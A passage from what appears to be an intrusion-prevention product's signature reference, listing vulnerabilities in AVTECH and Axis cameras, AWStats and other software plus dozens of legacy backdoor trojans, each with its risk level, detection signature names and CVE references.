Description: A command injection vulnerability in the firmware of the AVTECH IP camera model AVM1203 allows unauthenticated remote command execution.
Situation: HTTP_CRL-Avtech-IP-Camera-AVM1203-Command-Injection-CVE-2024-7029
References:
CVE-2024-7029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7029
Back to top

Avtech-IP-Camera-Cgi-Bin-Nobody-Access

About this vulnerability: A vulnerability in multiple versions of the AVTECH IP camera firmware
Risk: Moderate
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Platform: Generic
Software: AVTECH IP camera
Type: Malfunction
Description: Multiple versions of the AVTECH IP camera firmware allow unauthenticated access to the cgi scripts in the /cgi-bin/nobody folder if /nobody is included anywhere in the request URI.
Situation: HTTP_CSU-Avtech-IP-Camera-Cgi-Bin-Nobody-Access
Back to top

Avtech-IP-Camera-Multiple-Command-Injection-Vulnerabilities

About this vulnerability: Multiple vulnerabilities in AVTECH IP camera firmware
Risk: High
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Platform: Generic
Software: AVTECH IP camera
Type: Input Validation
Description: Various unauthenticated and authenticated command injection vulnerabilities without CVE identifiers have been reported in multiple versions of the AVTECH IP camera firmware.
Situation: HTTP_CRL-Avtech-IP-Camera-Multiple-Command-Injection-Vulnerabilities
Back to top

AwindInc-SNMP-Service-Command-Injection

About this vulnerability: A vulnerability in AwindInc
Risk: High
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AwindInc
Type: Input Validation
Description: A vulnerability in AwindInc and OEM'ed products, multiple versions, which allows remote attackers to execute arbitrary code due to the lack of user input validation.
Situation: SNMP-UDP_AwindInc-SNMP-Service-Command-Injection
References:
CVE-2017-16709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16709
Back to top

AwingSoft-Winds3D-Player-Command-Execution

About this vulnerability: An AwingSoft Winds3D Player Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-722-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP3
Software: AwingSoft Winds3D Player
Type: Input Validation
Description: A vulnerability in AwingSoft Winds3D Player Plugin, version 3.5.0.9 for Firefox 3.5 and IE 8, which allows remote attackers to execute arbitrary executable files, due to the failure of SceneURL() to validate input.
Situation: File-Text_AwingSoft-Winds3D-Player-Command-Execution
References:
CVE-2009-4850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4850
OSVDB-60049
http://www.osvdb.org/60049
Back to top

AwingSoft-Winds3D-Player-SceneURL-Buffer-Overflow

About this vulnerability: An AwingSoft Winds3D Player SceneURL Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-722-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: AwingSoft Winds3D Player
Type: Buffer Overflow
Description: A buffer overflow vulnerability in AwingSoft Winds3D Player Plugin, version 3.5.0.0 and before, which allows remote attackers to execute arbitrary executable files via a long SceneUrl property value.
Situation: File-Text_AwingSoft-Winds3D-Player-SceneURL-Buffer-Overflow
References:
CVE-2009-4588
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4588
OSVDB-60017
http://www.osvdb.org/60017
Back to top

Awstats-Migrate-Remote-Command-Execution

About this vulnerability: Awstats-Migrate Remote Command Execution 6.4 and 6.5
Risk: High
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: AWStats
Type: Code Injection
Description: A vulnerability in the AWStats 6.4 and 6.5 CGI script which allows a remote attacker to execute arbitrary code via shell metacharacters in the migrate parameter.
Situation: HTTP_CSU-Awstats-Migrate-Remote-Command-Execution
References:
CVE-2006-2237
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2237
BID-17844
http://www.securityfocus.com/bid/17844
OSVDB-25284
http://www.osvdb.org/25284
Back to top

Awstats-Totals-Remote-Code-Execution

About this vulnerability: An Awstats Totals Remote Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AWStats
Type: Input Validation
Description: A vulnerability in AWStats Totals, versions 1.0 through 1.14, which allows remote attacker to execute arbitrary code via PHP sequences in the sort parameter.
Situation: HTTP_CSU-Awstats-Totals-Remote-Code-Execution
References:
CVE-2008-3922
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922
BID-30856
http://www.securityfocus.com/bid/30856
OSVDB-47807
http://www.osvdb.org/47807
Back to top

Axigen-Free-Mail-Server-Directory-Traversal

About this vulnerability: An Axigen Free Mail Server Directory Traversal vulnerability.
Risk: High
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Axigen
Type: Directory Traversal
Description: A directory traversal vulnerability in the View Log Files component in Axigen Free Mail Server which allows remote attackers to read or delete arbitrary files via a dot-dot )..) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the edit action or delete action to the default URI.
Situation: HTTP_CSU-System-File-Disclosure
References:
CVE-2012-4940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4940
BID-56343
http://www.securityfocus.com/bid/56343
OSVDB-86802
http://www.osvdb.org/86802
Back to top

Axis-Camera-Control-ActiveX-Control-SetBMP-Buffer-Overflow

About this vulnerability: A vulnerability in AXIS Camera Control ActiveX control
Risk: High
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: AXIS Camera Control
Type: Buffer Overflow
Description: There is a vulnerability in the AXIS Camera Control ActiveX control. The vulnerability is due to insufficient validation of user-supplied parameters.
Situation: HTTP_Axis-Camera-Control-ActiveX-Control-SetBMP-Buffer-Overflow
HTTP_SS-Axis-Communications-Camera-Control-ActiveX-Object
File-Text_Axis-Camera-Control-ActiveX-Control-SetBMP-Buffer-Overflow
File-Text_Axis-Communications-Camera-Control-ActiveX-Object
References:
CVE-2007-2239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2239
BID-23816
http://www.securityfocus.com/bid/23816
OSVDB-35602
http://www.osvdb.org/35602
Back to top

Axis-Communications-Camera-Control-Image-Pan-Tilt-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in AXIS Communications AXIS Camera Control
Risk: High
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: AXIS Camera Control
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Camera Control ActiveX by AXIS Communications. The vulnerability is due to a boundary error in the handling of the "image_pan_tilt" property of the control. As a result of this, heap-based buffer overflow can occur which will allow arbitrary code injections and execution in the context of the current user.
Situation: HTTP_SS-Axis-Communications-Camera-Control-ActiveX-Object
File-Text_Axis-Communications-Camera-Control-ActiveX-Object
References:
CVE-2008-5260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5260
BID-33408
http://www.securityfocus.com/bid/33408
OSVDB-51532
http://www.osvdb.org/51532
Back to top

Axis-IP-Camera-Application-Upload

About this vulnerability: A vulnerability in Axis IP cameras.
Risk: High
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1445-5242
Platform: Linux
Software: AXIS Camera Application Platform
Type: Insecure Configuration
Description: A vulnerability in Axis IP cameras using AXIS Camera Application Platform, with Axis M3044-V firmware 9.80.3.8, which allows remote attackers to upload and execute eap applications on the target device, due to insufficient validation of the source.
Situation: HTTP_CS-Axis-IP-Camera-Application-Upload
Back to top

Axis-Media-Control-Unsafe-ActiveX-Method

About this vulnerability: An attempt to exploit a vulnerability in an AXIS device detected
Risk: High
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Platform: Generic
Software: AXIS Camera Application Platform
Type: Input Validation
Description: A vulnerability in AXIS network camera devices, version 6.2.10.11, which allows remote attackers to create or overwrite arbitrary files via a file path to the StartRecord, SaveCurrentImage, or StartRecordMedia methods.
Situation: File-Text_Axis-Media-Control-Unsafe-ActiveX-Method
References:
CVE-2013-3543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3543
Back to top

Axis-Network-Camera-Remote-Code-Execution

About this vulnerability: A vulnerability in Axis Network Camera
Risk: High
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AXIS Camera Control
Type: Code Injection
Description: A vulnerability in Axis Network Cameras which allows remote attackers to execute arbitrary code as root through parhand parameters.
Situation: File-Text_Axis-Network-Camera-Remote-Code-Execution
References:
CVE-2018-10660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10660
Back to top

axTLS-UTC-Time-Parse-Error

About this vulnerability: A vulnerability in axTLS
Risk: High
First detected in: sgpkg-ips-1116-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: axTLS
Type: Malfunction
Description: axTLS version 1.5.3 has a vulnerability where it interprets a UTCTime value in a X.509 certificate against the X.509 Certificate RFC. The RFC specifies that a yeah value of 50 or greater should be interpreted as year 19XX. However the axTLS version 1.5.3 interprets the UTCTime year 50 as year 2050.
Situation: HTTPS_SS-TLS-Certificate-Suspicious-UTCTime-Validity-End-Time
References:
CVE-2017-1000416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000416
Back to top

Azeotech-DAQFactory-NETB-Buffer-Overflow

About this vulnerability: A vulnerability in Azeotech DAQFactory
Risk: Moderate
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Azeotech DAQFactory
Type: Buffer Overflow
Description: There is a stack-based buffer overflow in Azeotech DAQFactory which allows remote attackers to cause a denial of service or to execute arbitrary code via a crafted NETB UDP packet.
Situation: Generic_UDP-Azeotech-DAQFactory-NETB-Buffer-Overflow
References:
CVE-2011-3492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3492
OSVDB-75496
http://www.osvdb.org/75496
Back to top

AZORult-Stealer-C2-Traffic

About this vulnerability: AZORult stealer C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: AZORult is an information stealer. It's also capable to download more malware to the infected system.
Situation: HTTP_CS-AZORult-Stealer-C2-Traffic
Back to top

B-Labs-Bopup-Communication-Server-Stack-Based-Buffer-Overflow

About this vulnerability: B Labs Bopup Communication Server Stack Based Buffer Overflow
Risk: High
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: B Labs Bopup
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in B Labs Bopup Communication Server 3.2.26.5460 which allows attackers to remotly execute arbitrary code via a crafted TCP request.
Situation: Generic_CS-B-Labs-Bopup-Communication-Server-Stack-Based-Buffer-Overflow
Generic_CS-B-Labs-Bopup-Communication-Server-Stack-Based-Buffer-Overflow-2
References:
CVE-2009-2227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2227
OSVDB-55275
http://www.osvdb.org/55275
Back to top

Backdoor-Agobot

About this vulnerability: Agobot is an IRC controlled backdoor
Risk: High
First detected in: sgpkg-ips-39-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Agobot
Type: Backdoor
Description: Agobot is an IRC controlled trojan that can be used, for example, to remotely control the host, launch DDOS attacks and infect new hosts. When Agobot infects a host, the new bot will join an IRC channel and execute commands given to it as messages.
Back to top

Backdoor-Alvgus

About this vulnerability: Backdoor Alvgus activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Alvgus
Type: Backdoor
Description: Alvgus is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-UDP_Alvgus-Request
BD-UDP_Alvgus-Response
Back to top

Backdoor-Amanda

About this vulnerability: Backdoor Amanda activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Amanda
Type: Backdoor
Description: Amanda is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Amanda-Request
BD-TCP_Amanda-Response
Back to top

Backdoor-AOL-Admin

About this vulnerability: Backdoor AOL Admin activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: AOL Admin
Type: Backdoor
Description: AOL Admin backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_AOL-Admin-Response
Back to top

Backdoor-Asylum

About this vulnerability: Asylum backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Asylum
Type: Backdoor
Description: Asylum backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-TCP_Asylum-Request
BD-TCP_Asylum-Response
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Backage

About this vulnerability: Backdoor Backage activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Backage
Type: Backdoor
Description: Backage is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Backage-Request
Back to top

Backdoor-BackConstruction

About this vulnerability: Backdoor BackConstruction activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: BackConstruction
Type: Backdoor
Description: BackConstruction backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-TCP_BackConstruction-Request
BD-TCP_BackConstruction-Response
Back to top

Backdoor-BackDoor

About this vulnerability: BackDoor program activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows NT; Windows 98
Software: Back Door
Type: Backdoor
Description: "BackDoor" is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_BackDoor-Request
BD-TCP_BackDoor-Response
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-BackOrifice2000

About this vulnerability: Back Orifice 2000
Risk: High
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Back Orifice 2000 is a remote control program that is often installed by a malware program. The program allows a remote attacker to silently control and spy the target system.
Situation: BD-TCP_Back-Orifice-2000
BD-TCP_Chupacabra
BD-UDP_Back-Orifice
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Balsitix

About this vulnerability: Balsitix backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Balsitix
Type: Backdoor
Description: Balsitix backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-UDP_Balsitix-Response
Back to top

Backdoor-Basic-Hell

About this vulnerability: Backdoor Basic Hell activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Basic Hell
Type: Backdoor
Description: Basic Hell is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Basic-Hell-Response
Back to top

Backdoor-BDDT

About this vulnerability: BDDT backdoor
Risk: High
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: BDDT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_BDDT-Response
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Bigorna

About this vulnerability: Bigorna backdoor
Risk: High
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Bigorna is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_One-Response
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-BioNet

About this vulnerability: Backdoor BioNet activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: BioNet
Type: Backdoor
Description: BioNet backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_BioNet-Request
BD-TCP_BioNet-Response
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-BLA

About this vulnerability: Backdoor BLA activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: BLA
Type: Backdoor
Description: BLA is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-UDP_BLA-Request
Back to top

Backdoor-Black-Angel

About this vulnerability: Black Angel backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Black Angel
Type: Backdoor
Description: Black Angel is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Black-Angel-Response
Back to top

Backdoor-Blade-Runner

About this vulnerability: Blade Runner backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Blade Runner
Type: Backdoor
Description: Blade Runner is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Blade-Runner-Response
Back to top

Backdoor-Blazer5

About this vulnerability: Backdoor Blazer5 activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Blazer5
Type: Backdoor
Description: Blazer5 backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_Blazer5-Response-In-Default-Port
BD-TCP_Blazer5-Response
Back to top

Backdoor-Blood-Fest-Evolution

About this vulnerability: Backdoor Blood Fest Evolution activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Blood Fest Evolution
Type: Backdoor
Description: Blood Fest Evolution is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Blood-Fest-Evolution-Respose
Back to top

Backdoor-Breach

About this vulnerability: Breach backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98; Windows NT
Software: Breach
Type: Backdoor
Description: Breach is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Breach-Response
Back to top

Backdoor-Bugs

About this vulnerability: Bugs backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98; Windows NT
Software: Bugs
Type: Backdoor
Description: Bugs is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Bugs-Response-In-Default-Port
BD-TCP_Bugs-Response
Back to top

Backdoor-Buschtrommel

About this vulnerability: Buschtrommel backdoor
Risk: High
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: BuschtrommelD is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Buschtrommel
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-ButtMan

About this vulnerability: Backdoor ButtMan activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ButtMan
Type: Backdoor
Description: ButtMan is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_ButtMan-Request
Back to top

Backdoor-CAFEiNi

About this vulnerability: Backdoor CAFEiNi activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: CAFEiNi
Type: Backdoor
Description: CAFEiNi is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_CAFEiNi-Response
Back to top

Backdoor-Celine

About this vulnerability: Backdoor Celine activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Celine
Type: Backdoor
Description: Celine is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Celine-Response
Back to top

Backdoor-Cero

About this vulnerability: Backdoor Cero activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Cero
Type: Backdoor
Description: Cero is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Cero-Response
Back to top

Backdoor-Connection

About this vulnerability: Backdoor Connection activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Connection
Type: Backdoor
Description: Connection backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_Connection-Response
Back to top

Backdoor-Crack-Down

About this vulnerability: Crack Down backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Cray Down
Type: Backdoor
Description: Crack Down is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Crack-Down-Response
Back to top

Backdoor-CrazzyNet

About this vulnerability: Backdoor CrazzyNet activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: CrazzyNet
Type: Backdoor
Description: CrazzyNet backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-TCP_CrazzyNet-Response
Back to top

Backdoor-Danton

About this vulnerability: Backdoor Danton activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Danton
Type: Backdoor
Description: Danton is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Danton-Response
Back to top

Backdoor-Dark-Connection-Inside

About this vulnerability: Backdoor Dark Connection Inside activity
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Dark Connection Inside
Type: Backdoor
Description: Dark Connection Inside is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Dark-Connection-Inside-Response
Back to top

Backdoor-Deep-Throat

About this vulnerability: Backdoor Deep Throat activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Deep Throat
Type: Backdoor
Description: Deep Throat backdoor allows a remote attacker to control the infected system.
Situation: BD-UDP_Deep-Throat-Response-2
BD-UDP_Deep-Throat-Response
Back to top

Backdoor-DFch-Grisch

About this vulnerability: DFch Grisch backdoor
Risk: High
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: DFch Grisch is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_DFch-Grisch
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Digital-Rootbeer

About this vulnerability: Digital Rootbeer backdoor
Risk: High
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Digital Rootbeer is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Digital-Rootbeer
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Doly

About this vulnerability: Backdoor Doly activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Doly
Type: Backdoor
Description: Doly backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_Dolly-Request
BD-TCP_Doly-1-7-Request
BD-TCP_Doly-Response
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Donald-Dick

About this vulnerability: Donald Dick activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98; Windows NT
Software: Donald Dick
Type: Backdoor
Description: Donald Dick is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Donald-Dick-Response
Back to top

Backdoor-Drat

About this vulnerability: Backdoor Drat activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Drat
Type: Backdoor
Description: Drat is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Drat-Response
Back to top

Backdoor-DTr

About this vulnerability: DTr backdoor activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: DTr
Type: Backdoor
Description: DTr is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_DTr-Response
Back to top

Backdoor-Duddie

About this vulnerability: Duddie backdoor
Risk: High
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Duddie is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Duddie
BD-TCP_Duddie-2.0
BD-TCP_Duddie-3.1
BD-TCP_Duddie-3.2
BD-TCP_EventHorizon
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-ENM-Malware

About this vulnerability: Backdoor EMN malware
Risk: High
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Backdroon-ENM is a Windows malware.
Situation: HTTP_CRL-Backdoor-ENM-Detected
Back to top

Backdoor-Executor

About this vulnerability: Executor backdoor
Risk: High
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Executor is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: HTTP_CS-Executor-Backdoor
References:
CVE-1999-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0660
Back to top

Backdoor-Exploiter

About this vulnerability: Backdoor Exploiter activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98; Windows ME
Software: Exploiter
Type: Backdoor
Description: Exploiter is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Exploiter-Response
Back to top

Backdoor-F-Backdoor

About this vulnerability: Backdoor F-Backdoor activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: F-Backdoor
Type: Backdoor
Description: F-Backdoor is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_F-Backdoor-Response
Back to top

Backdoor-Forced-Entry

About this vulnerability: Backdoor Forced Entry activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Forced Entry
Type: Backdoor
Description: Forced Entry backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_Forced-Entry-Response
Back to top

Backdoor-Fore

About this vulnerability: Fore backdoor activity
Risk: High
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98
Software: Fore
Type: Backdoor
Description: Fore backdoor allows a remote attacker to control the infected system via a specific client program.
Situation: BD-TCP_Fore-Response
Back to top

Backdoor-Frenzy

About this vulnerability: Backdoor Frenzy activity
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98
Software: Frenzy
Type: Backdoor
Description: Frenzy backdoor allows a remote attacker to control the infected system.
Situation: BD-TCP_Frenzy-Response
Back to top

Backdoor-Frenzy-2000

About this vulnerability: Frenzy 2000 backdoor
Risk: High
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Frenzy 2000 is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation: BD-TCP_Frenzy-2000
References:
CVE-1999-0660
